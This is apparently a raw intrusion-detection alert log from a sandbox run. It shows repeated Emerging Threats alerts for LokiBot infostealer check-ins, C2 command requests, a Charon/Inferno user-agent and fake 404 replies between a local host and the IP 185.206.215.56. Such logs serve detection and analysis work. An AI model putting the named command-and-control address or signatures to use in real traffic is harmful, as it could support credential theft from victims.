                                                                                        01/05/21-19:06:18.364453TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.531194TCP2025483ET TROJAN LokiBot Fake 404 Response8049195185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.788238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.959883TCP2025483ET TROJAN LokiBot Fake 404 Response8049196185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.176157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.341245TCP2025483ET TROJAN LokiBot Fake 404 Response8049197185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.576040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.751716TCP2025483ET TROJAN LokiBot Fake 404 Response8049198185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.958724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.125690TCP2025483ET TROJAN LokiBot Fake 404 Response8049199185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.390921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.569029TCP2025483ET TROJAN LokiBot Fake 404 Response8049200185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.950521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.111865TCP2025483ET TROJAN LokiBot Fake 404 Response8049201185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:21.679580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.837782TCP2025483ET TROJAN LokiBot Fake 404 Response8049202185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.303822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.484253TCP2025483ET TROJAN LokiBot Fake 404 Response8049203185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.694392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.877247TCP2025483ET TROJAN LokiBot Fake 404 Response8049204185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.094147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.267446TCP2025483ET TROJAN LokiBot Fake 404 Response8049205185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.470458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.640827TCP2025483ET TROJAN LokiBot Fake 404 Response8049206185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.862730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.026554TCP2025483ET TROJAN LokiBot Fake 404 Response8049207185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.246261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.440570TCP2025483ET TROJAN LokiBot Fake 404 Response8049208185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.648294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.816571TCP2025483ET TROJAN LokiBot Fake 404 Response8049209185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.024326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.203072TCP2025483ET TROJAN LokiBot Fake 404 Response8049210185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.428992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.591475TCP2025483ET TROJAN LokiBot Fake 404 Response8049211185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.813759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.992160TCP2025483ET TROJAN LokiBot Fake 404 Response8049212185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.197896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.381041TCP2025483ET TROJAN LokiBot Fake 404 Response8049213185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.599441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.766199TCP2025483ET TROJAN LokiBot Fake 404 Response8049214185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.971788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.131364TCP2025483ET TROJAN LokiBot Fake 404 Response8049215185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:27.359759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.547159TCP2025483ET TROJAN LokiBot Fake 404 Response8049216185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:27.753620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.916227TCP2025483ET TROJAN LokiBot Fake 404 Response8049217185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.127709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.287151TCP2025483ET TROJAN LokiBot Fake 404 Response8049218185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.505441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.661950TCP2025483ET TROJAN LokiBot Fake 404 Response8049219185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.880701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.048592TCP2025483ET TROJAN LokiBot Fake 404 Response8049220185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:29.244495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.409620TCP2025483ET TROJAN LokiBot Fake 404 Response8049221185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:29.630364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.797474TCP2025483ET TROJAN LokiBot Fake 404 Response8049222185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.014888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.193197TCP2025483ET TROJAN LokiBot Fake 404 Response8049223185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.409915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.572043TCP2025483ET TROJAN LokiBot Fake 404 Response8049224185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.786520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.947633TCP2025483ET TROJAN LokiBot Fake 404 Response8049225185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.159641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.319802TCP2025483ET TROJAN LokiBot Fake 404 Response8049226185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.542986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.697483TCP2025483ET TROJAN LokiBot Fake 404 Response8049227185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.903232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.053069TCP2025483ET TROJAN LokiBot Fake 404 Response8049228185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:32.262786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.426688TCP2025483ET TROJAN LokiBot Fake 404 Response8049229185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:32.647726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.815517TCP2025483ET TROJAN LokiBot Fake 404 Response8049230185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.031393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.190810TCP2025483ET TROJAN LokiBot Fake 404 Response8049231185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.398944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.560619TCP2025483ET TROJAN LokiBot Fake 404 Response8049232185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.770156TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.939742TCP2025483ET TROJAN LokiBot Fake 404 Response8049233185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.165366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.334828TCP2025483ET TROJAN LokiBot Fake 404 Response8049234185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.564013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.721364TCP2025483ET TROJAN LokiBot Fake 404 Response8049235185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.935155TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.122327TCP2025483ET TROJAN LokiBot Fake 404 Response8049236185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:35.342016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.512183TCP2025483ET TROJAN LokiBot Fake 404 Response8049237185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:35.726449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.894052TCP2025483ET TROJAN LokiBot Fake 404 Response8049238185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.098105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.277202TCP2025483ET TROJAN LokiBot Fake 404 Response8049239185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.491085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.491085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22185.206.215.56
